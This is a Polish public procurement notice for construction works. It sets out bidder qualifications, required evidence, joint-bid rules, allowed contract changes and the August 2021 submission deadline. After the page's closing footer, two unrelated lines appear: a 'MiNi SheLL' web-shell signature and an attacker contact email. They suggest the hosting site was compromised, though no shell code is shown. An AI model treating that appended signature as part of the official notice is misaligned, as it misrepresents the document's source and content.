wykazać, że wykonał należycie nie wcześniej niż w okresie ostatnich 5 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie co najmniej jedną robotę budowlaną o wartości co najmniej 160 000,00 zł brutto<br/>polegającą na budowie lub przebudowie budynku w obejmującą roboty budowlane zakresie<br/>robót konstrukcyjnych lub zabezpieczających konstrukcję budowlaną,<br/>2) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą<br/>dysponować w okresie wykonywania zamówienia i skierują do jego realizacji min. jedną osobą<br/>(która będzie pełnić funkcję kierownika budowy) posiadającą uprawnienia budowlane do<br/>kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub<br/>odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej<br/>obowiązujących przepisów (w przypadku Wykonawców zagranicznych – uprawnienia budowlane<br/>do kierowania robotami równoważne do wyżej wskazanych) oraz posiadać kwalifikacje, o<br/>których mowa w art. 37c i g ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad<br/>zabytkami (t.j. Dz. U. z 2020 r. poz. 282).<br/>DODATKOWE INFORMACJE DOTYCZĄCE WARUNKÓW<br/>UDZIAŁU W POSTĘPOWANIU:<br/>1) Wykonawca powinien w wykazie robót wyraźnie określić zakres robót, aby można było<br/>ustalić, czy spełnia warunek udziału w postępowaniu.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub<br/>korzystania z zasobów podmiotów trzecich na podstawie art. 118 ust. 1 ustawy Pzp minimum<br/>jeden Wykonawca lub jeden podmiot udostępniający zasoby musi posiadać pełne<br/>doświadczenie wskazane w ww. warunku udziału w postępowaniu – pkt 6.1.4, ppkt 1) SWZ.<br/>3) Przez posiadanie uprawnień budowlanych wymaganych prawem dla osób uczestniczących w<br/>realizacji zamówienia, rozumie się uprawnienia do wykonywania samodzielnych funkcji w<br/>budownictwie w rozumieniu art. 15a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U.<br/>2020 r, poz. 1333 z późn. zm.) oraz przepisów wcześniejszych. Samodzielne funkcje techniczne<br/>w budownictwie (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami<br/>regulującymi nadawanie uprawnień budowlanych w dacie ich nadania.<br/>4) Wykonawca w celu wykazania spełniania warunków określonych w pkt 6.1.4, ppkt 2) SWZ<br/>może wskazać osobę będącą obywatelem państwa członkowskiego UE, która nabyła<br/>kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznaczne<br/>wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium<br/>Rzeczypospolitej Polskiej – zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia<br/>22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (t. j. Dz. U. z 2020 r., poz. 220) oraz ustawą z dnia 15 grudnia<br/>2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r.poz. 1117).<br/>6.2. Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie<br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia na każdym etapie postępowania (art.<br/>116 ust. 2 ustawy Pzp).<br/>6.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując<br/>warunek udziału w postępowaniu mogą polegać na zdolnościach tych z Wykonawców, którzy<br/>wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane<br/>6.4. Sposób wykazania warunków udziału w postępowaniu wskazano w rozdziale<br/>8 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.3. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania)<br/>następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>8.3.1. W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed terminem<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane (sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ), oraz załączeniem dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie<br/>uzyskać tych dokumentów –inne odpowiednie dokumenty – w odniesieniu do warunku określonego w<br/>pkt. 6.1.4. ppkt. 1) SWZ,<br/>b) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego<br/>zgodnie z Załącznikiem Nr 8 do SWZ – w odniesieniu do warunku określonego w pkt. 6.1.4. ppkt. 2)<br/>SWZ.<br/>8.3.2. W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu:<br/>Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym<br/>zakresie.<br/>8.4. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie<br/>zamówienia, Zamawiający może na każdym etapie postępowania wezwać wykonawców do złożenia<br/>wszystkich lub niektórych podmiotowych środków dowodowych, wskazanych w pkt. 8.3.1 SWZ.<br/>8.5. Wykonawca składa podmiotowe środki dowodowe na wezwanie Zamawiającego. Dokumenty te<br/>powinny być aktualne na dzień ich złożenia.<br/>8.6. Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki<br/>dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę lub<br/>wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych<br/>na dzień ich złożenia.<br/>8.7. Zamawiający nie będzie wzywał do złożenia podmiotowych środków dowodowych, jeżeli może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów<br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w pkt 8.1SWZ dane umożliwiające dostęp do tych środków.<br/>8.8. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawcy złożenia wraz z ofertą przedmiotowych środków<br/>dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 9.1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>9.2. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub<br/>sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w<br/>danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>9.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane.<br/>9.4. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu<br/>do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>9.5. Zobowiązanie podmiotu udostępniającego zasoby lub inny środek dowodowy, o którym<br/>mowa w pkt 9.4 SWZ potwierdza, że stosunek łączący Wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w<br/>szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>9.6. Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby<br/>zdolności tech. lub zawodowe pozwalają na wykazanie przez Wykonawcę spełniania warunków<br/>udziału w postępowaniu a także zbada, czy nie zachodzą, wobec tego podmiotu podstawy<br/>wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>9.7. Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą,<br/>wobec tego podmiotu podstawy wykluczenia, Zamawiający zażąda, aby Wykonawca w terminie<br/>określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>9.8. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniami, o którym mowa w pkt 8.1 SWZ<br/>także oświadczenia podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim Wykonawca powołuje się na jego zasoby.<br/>9.9. Zamawiający nie żąda wskazania przez Wykonawcę, w ofercie, części zamówienia, których<br/>wykonanie zamierza powierzyć podwykonawcom, którzy nie są podmiotami udostępniającymi<br/>zasoby, oraz podania nazw ewentualnych podwykonawców.<br/>9.10. W przypadku zamówień na roboty budowlane oraz usługi, które mają być wykonane w<br/>miejscu podlegającym bezpośredniemu nadzorowi Zamawiającego, Zamawiający będzie żądał,<br/>aby przed przystąpieniem do wykonania zamówienia Wykonawca podał nazwy, dane<br/>kontaktowe oraz przedstawicieli, podwykonawców zaangażowanych w takie roboty budowlane<br/>lub usługi, jeżeli są już znani. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć<br/>wg wymogów załącznika nr 6 do SWZ.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt.<br/>8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie<br/>warunku.<br/>10.3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony dopuszczają możliwość wprow. zmiany umowy w stos. do treści oferty, na podst. której<br/>dok. wyboru Wyk., w przyp. wyst. którejkolwiek z okoliczności: 1) zmniejszenie zakresu<br/>przedmiotu umowy, gdy jego wyk. w pierwotnym zakresie nie leży w interesie publ.,<br/>2) zmiana materiałów bud., urządzeń lub technologii wykonania na inne posiad. co najmniej<br/>takie same parametry jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboruoferty w przyp.:a) niedostępności na rynku materiałów lub urządzeń wskazanych w dok. projektowej/ tech., lub<br/>wycofania z rynku tych materiałów lub urządzeń,b) pojawienia się na rynku materiałów lub<br/>urządzeń nowszej generacji pozwalających na zmniejszenie kosztów wyk. przedmiotu umowy,c)<br/>pojawienia się nowszej technologii wyk., pozwalającej na zaoszczędzenie czasu realizacji lub<br/>kosztów wyk. przedmiotu umowy,<br/>d) konieczności zrealizowania robót przy zast. innych rozwiązań tech. lub technologicznych niż<br/>wskazane w dok. proj. lub specyfikacji tech., w sytuacji gdyby zast. przewidzianych wcześniej<br/>rozwiązań groziło niewykonaniem lub wadliwym wyk. przedmiotu umowy,<br/>e) podyktowane to będzie usprawnieniem procesu budowy lub zwiększeniem bezpieczeństwa<br/>na budowie lub zmianą przepisów prawa,<br/>3) przedłużenie terminu realizacji przedmiotu umowy, w przyp.:<br/>a) gdy zachowanie pierwotnie okreś.terminu nie leży w interesie publicznym, o okres<br/>umożliwiający osiągnięcie uzasad. interesu publicznego,<br/>b) konieczności zmniejszenia zakresu przedmiotu umowy, gdy jego wyk. w pierwotnym zakresie<br/>nie leży w interesie publicznym, o okres proporcjonalny do zmniejszonego zakresu,<br/>c) konieczności wykonania dodatk.badań i ekspertyz, o okres niezbędny do wyk. dodatk.badań i<br/>ekspertyz,d) wydłużenia terminów dostaw materiałów lub urządzeń niezależnych od Wyk., o<br/>okres wydłużenia terminu dostaw materiałów lub urządzeń, e) zaistnienia niesprzyjających war.<br/>atmosfer., uniemożliw. wyk. robót zgodnie z przyjętą technologią i wymogami opisanymi w<br/>STWiORB, udokumentowanych w dzienniku budowy i potw. wyciągiem z IMiGW, o czas trwania<br/>niesprzyjających wa.atmosf.<br/>4) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust.1, może nastąpić w<br/>przyp. wyst. okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od<br/>żadnej ze stron, zewn., niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie<br/>umowy, w szczeg.: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i adm.<br/>publ., przy czym przedłużenie terminu realizacji nastąpi o liczbę dni, odpowiadającą okresowi<br/>wyst. okoliczności siły wyższej,<br/>5) przedłużenie terminu , o którym mowa w § 2 ust.1, może nastąpić w przyp. skierowania przez<br/>Zam. do Wyk. pisemnego żądania wstrzymania robót bud., stanowiących przedmiot zam. lub<br/>wydania zakazu prow. robót bud., przez organ adm. publ. lub eksploatorów infrastruktury, o ile<br/>żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wyk. ponosi odpowiedzialność,<br/>przy czym przedłużenie terminu realizacji zam. nastąpi o liczbę dni, odpowiadającą okresowi na<br/>jaki Wyk. nakazano wstrzymanie robót budowlanych lub zakazano prowadzenie robót bud.,<br/>6) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust.1, może nastąpić w<br/>przyp. wyst. konieczności wprowadzenia w dok. projektowej zmian, powodujących wstrzymanie<br/>lub przerwanie robót bud., stanowiących przedmiot zamówienia, przy czym przedłużenie terminu<br/>realizacji zamówienia nastąpi o liczbę dni niezbędną do wprowadzenia zmian w dok. proj. oraz<br/>do przepr. uzgodnień (ustaleń) z właśc. organami, uzyskania opinii organów oraz wydania<br/>decyzji przez właściwe organy, przy czym wprow. w dok. proj. zmian nie może skutkować<br/>zwiększeniem (zmianą) zakresu świadczenia Wykonawcy zaw. w ofercie oraz zwiększeniem<br/>wynagrodzenia Wykonawcy, o którym mowa w § 3 ust. 1,<br/>7) przedłużenia terminu wyk. zamówienia w zakresie niezbędnym do wyk. robót zleconych na<br/>podst. art. 455 ust. 1 pkt 1, 3, 4 lub ust. 2 ustawy Pzp,<br/>cd. - Informacje dodatkowe <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-27 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wyk. składa ofertę przez .„Formularz do złożenia, zmiany, wycofania oferty lub wniosku” z ePUAP i udostępnionego też na miniPortalu. Funkcjonalność do zaszyfr. oferty przez Wyk. jest dostępna dla wyk. na miniPortalu, w szczegółach danego postęp. W formularzu oferty Wyk. Zob. jest podać adres skrzynki ePUAP, na którym prow. będzie koresp. związana z postęp. https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-27 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I.zmiany umowy -cd:1) przedłużenia terminu wykonania zamówienia w zakresie niezbędnym do<br/>wykonania robót zleconych na podstawie art. 455 ust. 1 pkt 1, 3, 4 lub ust. 2 ustawy Prawo<br/>zamówień publicznych,<br/>2) zmniejszenie wynagrodzenia należnego Wykonawcy w przypadku zmniejszenia zakresu<br/>przedmiotu umowy, w sytuacji, o której mowa w pkt 1), na podstawie wyliczenia wartości<br/>zmniejszonego zakresu określonej przez strony umowy,<br/>3) zmiana treści kosztorysu ofertowego w przypadku zmniejszenia zakresu przedmiotu umowy w<br/>sytuacji, o której mowa w pkt 1),<br/>4) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni<br/>wpływ na realizację przedmiotu zamówienia lub świadczenia stron umowy,<br/>5) w przypadku zmiany albo rezygnacji z podwykonawcy, na którego zasoby wykonawca<br/>powoływał się w celu wykazania spełniania warunków udziału w postępowaniu Wykonawca jest<br/>obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca<br/>samodzielnie spełnia warunki udziału w postępowaniu, w stopniu nie mniejszym niż wymagany<br/>w trakcie postępowania o udzielenie zamówienia, poprzez przedstawienie w tym celu<br/>odpowiednich dokumentów, potwierdzających spełnianie warunków udziału w postępowaniu,<br/>6) zmiany sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy wskutek<br/>zaistnienia przyczyn organizacyjnych lub finansowych leżących po stronie Zamawiającego,<br/>7) wszelkie zmiany, które będą konieczne do zagwarantowania zgodności umowy z<br/>wchodzącymi w życie po terminie składania ofert lub po zawarciu umowy przepisami prawa w<br/>szczególności przepisami o podatku od towarów i usług w zakresie wynikającym z tych<br/>przepisów.<br/>1. Nie stanowi zmiany istotnej umowy w rozumieniu art. 454 ustawy Prawo zamówień<br/>publicznych:<br/>1) zmiana danych teleadresowych,<br/>2) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy(np. zmiana nr<br/>rachunku bankowego).<br/>2. Z wnioskiem o zmianę umowy może wystąpić zarówno Wykonawca, jak i Zamawiający.<br/>3. Strona, która występuje z propozycją zmiany umowy, w oparciu o przedstawiony powyżej<br/>katalog zmian umowy zobowiązana jest do sporządzenia i uzasadnienia wniosku o taką zmianę.<br/>Wszelkie zmiany umowy dla swej ważności wymagają formy pisemnej w postaci aneksu do<br/>umowy.<br/>II. 13.4. Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1) Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 3 do SWZ (przy<br/>czym Wykonawca może sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować<br/>dane wymagane dla oferty w SWZ i załącznikach).<br/>2) Oświadczenia, o których mowa w pkt 8.1 SWZ;<br/>3) Oświadczenie, o którym mowa w pkt 8.2 SWZ (jeżeli dotyczy),<br/>4) Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4 SWZ (jeżeli dotyczy).<br/>5) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu<br/>udostępniającego zasoby:<br/>a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu<br/>udostępniającego zasoby jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertąodpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia<br/>dokumentów, o których mowa w lit a), jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające<br/>dostęp do tych dokumentów.<br/>c) jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a),<br/>Zamawiający żąda od Wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą<br/>pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania<br/>Wykonawcy.<br/>6) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udziel. zam.<br/>w post. o udziel. zam. albo do reprezentowania ich w postępowaniu i zawarcia umowy (jeżeli<br/>dotyczy).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-11 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com